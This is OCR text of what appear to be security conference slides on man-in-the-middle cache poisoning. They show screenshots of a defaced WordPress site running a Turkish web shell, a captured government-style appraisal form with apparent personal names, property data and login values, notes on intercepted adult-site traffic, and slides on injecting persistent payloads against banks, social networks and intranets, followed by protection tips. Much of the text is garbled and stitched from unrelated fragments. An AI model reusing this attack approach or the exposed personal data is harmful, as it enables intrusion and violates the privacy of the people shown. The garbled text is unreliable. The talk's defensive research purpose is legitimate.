Cultivate a Positive Mind-Set Through Meditation 

Meditation 

&0.05 

2/29/2012 

1:40:05 PM 

2/29/2012 

1:40:28 PM 

2/29/2012 

1:41:41 PM 

5 Tips To Help You Master Digital Photography 

Photography 

SO. 04 

2/29/2012 

1:38:37 PM 

2/29/2012 

1:39:34 PM 

2/29/2012 

1:39:56 PM 

Modern hand Analysis : Whafs In It For us? 

Spirituality 

S0.05 

2/29/2012 

1:37:40 PM 

2/29/2012 

1:38:36 PM 

2/29/2012 

1:39:31 PM 

Methods for photo backups 

Photography 

&0.05 

2/29/2012 

1:36:47 PM 

2/29/2012 

1:37:40 PM 

2/29/2012 

1:38:30 PM 

Soothing Music: The Native American Flute 

Music 

SO. 04 

2/29/2012 

1:36:05 PM 

2/29/2012 

1:36:48 PM 

2/29/2012 

1:37:27 PM 

What does it mean to be an expatriate? Part 2 - 
How to choose your paradise 

Coaching 

S0.05 

2/29/2012 

1:35:39 PM 

2/29/2012 

1:36:05 PM 

2/29/2012 

1:36:42 PM 

Diabetes Epidemic because of self-inflicted Obesity 

Diabetes 

S0.06 

2/29/2012 

1:35:12 PM 

2/29/2012 

1:35:38 PM 

2/29/2012 

1:36:01 PM 

The Poor Man's Guide To Rich Looking Videos 

Marketing 

SO. 07 

2/29/2012 

1:34:56 PM 

2/29/2012 

1:35:11 PM 

2/29/2012 

1:35:35 PM 

World's Hottest Hot Sauce - Blair's 16 Million 

Reserve 

Food and 

Beverage 

S0.05 

2/29/2012 

1:34:14PM 

2/29/2012 

1:34:56 PM 

2/29/2012 

1:35:08 PM 
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Account 


Refer A Friend 


Affiliate Program 


Referral Report 


Account Details 


Balance 


Redeem 


























HaxOrs and defacers.... 



Informatica 

www.informatica64.corn 









...hacking... 


/ (3 Hacked By SkyNet \ 




G O www.trendwp.com 



☆ l« ^ 


a] Esta pagina esta escrita en 


turco 


iQuieres trad... 


Traducir 


No 


Configuracion ▼ 


Sitede Buluuan Temalar %25 indiruu He Satilmaktadir. Boyle Para G^zlere iDauma^niiz. 3 

I 5 Kuni^luk Temlarai Verdip Fiyata Bakm Gelio Sidere bakki Neyse O ^ekilde Vetia ve Olu^ao 
HerT'^rl’'^ Soniuda nizmetiuizdejiz. 

ileti^mi icm: By_BuRaK@Hotiiiail.De 
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.. and hacked 


/© Sky Net | Casu& Shell 




0 


<5 © www,trendwp,com/demo/trendhaber/wp-includes/css/casus,php 


☆ |0 A 


^ Esta pagina esta escrita en 

www.treinlwp.coni {77.223.130.22) 


turco 


iQuieres traducirla? 


Traducir 


No 


Configuracidn 


Gikis I Ana Dizin | MvSQL Baalan | MvSQL Yukle & Indir | Komut Galistir | FHF BilQisi | Eval FHF Kod | Back Gonnect 

Dosya Yoneticisi - Gecerli Disk Ucretsiz 91.95 G of 431.72 G (21.3%| 

Bulundugun Dizin {Writable, 0755) 


FhpSpvVer: 2010 

Safe Mode:Yes 


/home/trend/public htmiydemo/trendhaber/wp-includesycssy 


Ana Dizin | Yazilabilir Goster | Dizin Olusturmak | Dosva Olustur 


Seleccionar archivo No se ha ... archivo 



Adi 

Son Dogistirilme 

Boyut 

Chmod 

Islem 

= 

Ust Dizin 






□ 

admin-bar-rtl.css 

2012-02-10 00:21:07 

2.95 K 

0644/-rvv-r-r- 

Indir 1 KoDvala 1 Duzenie 1 Yeni Ad 1 Zaman 






□ 

admin-bar-rtl.dev.css 

2012-02-10 00:21:07 

3.48 K 

0644/-rw-r-r- 

Indir 1 Koovala 1 Duzenie 1 Yeni .Ad 1 Zaman 






□ 

admin-bar.css 

2012-02-10 00:21:07 

10.67 K 

0644/-rvy'-r-r- 

Indir 1 KoDvala 1 Duzenie 1 Yeni Ad 1 Zaman 


Elements jii \ Resources i<£» Network! Scripts Timeline Profiles Audits Console 


Search Network 


Name 

Path 


iO| 



<> 

easjs.php 

/demo/trend h a ber/w p-in clud e| 



^SfHfBjis 

Ll 

0 

• 

■III 

■ ■ 

!i! 


Headers Preview Response Cookies Timing 

Reqjest URL: http://jino.ji.funpic.org/lq/security.js 
Reqjest Method: CET 
StatJsCode: #404 Not Found 
T Req je st Heade rs view so u rce 

I I Documents Stylesheets Images Scripts XHR Fonts Web Sockets Other 


Oi 
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Intranets 


colon 



1S9.254.133.50 


colon 


nombreCompleto=LIC. GUSTAVO MUNOZ DOMINGUEZ 

folio Solicftud= 

estadoAvaluo=CP 

f ech a Crea cio n=01 /O 3/2012 

cveCatastra l= 0560 050 040 0 0 

=bcc 

n 0 mPro pCo mpleto=FE LIPA CAM ACH 0 RE YE S 

su pCo nstru ccio n=165.57 

su pTerren o =790.97 

giro=HABTACIONAL 

regimen=PARTICU LARES 

lote=004 

manzana=005 

tipoAvaluo=AN 

anioRef=0 

tipo0peracion=2 

supTerrenoEsc= 

numColonia=140 

tipoCalle=1 

numCalle=-1 

numExt=6 

numlnt= 

codigoPost=27410 

ubicacion= 

imagen= 

=Subir Croquis 
=Graba Solicitud 
=Votver 
mode=nueva 


usuariowg b=NOT9 

N eb=G U STAVO 09 

-Entrar 
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And, of course, PrOn 


Acujjus A pcxstore^ car.:.«dat d* UnU mofigatsnji 


llallaii (libiijos <le penes de liaee 700 anos 
eii iiiia iglesia 


£/ desmonra^ dtl 
artescmado m w%a igiesta 
rtpoAoia m Volrntia ha 
3 orprmdvdo a fades con un 
Hctlaxgo tfnisuai Bn el 
proems de reetauraewn del 
temple, hast aparreido 
t ahiu^ .^fmbolos fisHcos dr 
i urjji lamaAM, modelcn y 
mtthdae, r inchisa haste eon 
CttliS 


Lste no es el caso unico \ simllarea ilustracionr» ban 
aoaa oa a* 15:00 aparaeido a] Iniriaraa laborm da reno acidn an adiflckM 

antlgiioA. lnclu>rndo ofras l](la«laA. 


Dm 'JAR PHNES 


Incluso una iglesia es buen lugar para sacar tu Da Vinci interior 
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PrOn 



1+] [-] chaturbate.cDm 
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Do Payloads: Infect webs for 
the future 
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Targeting Attacks 


• Select the Target 

• Bank 

• Social Network 

• Intranet 

• Analyze loaded files 

• Payload: 

• Inject and load a infected file for that target, in 
every web the victim visits. 

• Profit. 
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Demo Facebook 
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Protections 


• Take care of mitm 
schemas 

• Proxy 

• TOR networks 

• After using them, clean 
all 

• Cache is not your friend 
on the Internet 

• VPNs is not a silver bullet 
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Questions? 

chenna@infornnatica64.com 

mfernanclez@informatica64.com 
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